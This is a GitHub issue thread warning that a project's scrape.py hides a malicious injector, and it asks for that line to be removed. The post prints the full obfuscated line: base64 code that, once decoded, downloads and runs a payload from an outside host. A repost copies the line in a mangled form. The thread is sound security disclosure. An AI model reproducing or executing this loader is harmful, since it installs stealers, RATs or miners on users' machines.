Remove injector

[JustJass]

Hello,

⚠️ This project contains a malicious injector! ⚠️

What does the injector do? :

All versions of the injector are different, but they always are a base64 encoded string being decoded, compiled and executed.
The code being executed downloads and executes a file on the user's system.
From my observations this file is an info stealer, RATs, and most commonly miners!

File location :

proxyboard/scrape.py line 402

Suggested change :

line can be fully removed as the type function only returns a class and is used as a decoy to hide the injector.

Full line :

type("__main__")
,__import__('builtins').exec(__import__('builtins').compile(__import__('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vd2FzcC5wbGFndWUuZnVuL2luamVjdC9JOUswT3BKbkQyTEhCbWx0JykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw=="),'<string>','exec'))

Do not blindly trust github repos and always review a project before running it!

Kind regards,
Grassor Killian

[gusdcoder]

Hello,

⚠️ This project contains a malicious injector! ⚠️

What does the injector do? :

All versions of the injector are different, but they always are a base64 encoded string being decoded, compiled and executed.

The code being executed downloads and executes a file on the user's system.

From my observations this file is an info stealer, RATs, and most commonly miners!

File location :

proxyboard/scrape.py line 402

Suggested change :

line can be fully removed as the type function only returns a class and is used as a decoy to hide the injector.

Full line :

type("main")

,import('builtins').exec(import('builtins').compile(import('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vd2FzcC5wbGFndWUuZnVuL2luamVjdC9JOUswT3BKbkQyTEhCbWx0JykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw=="),'','exec'))

Do not blindly trust github repos and always review a project before running it!

Kind regards,

Grassor Killian

thx bro

[JustJass]

No problem, I've been working for the past few weeks on finding all github accounts containing malicious injectors, and reporting the ones who do it on purpose and creating an issue like this one for people who accidentally cloned one.
Doing my best to stop it's spread!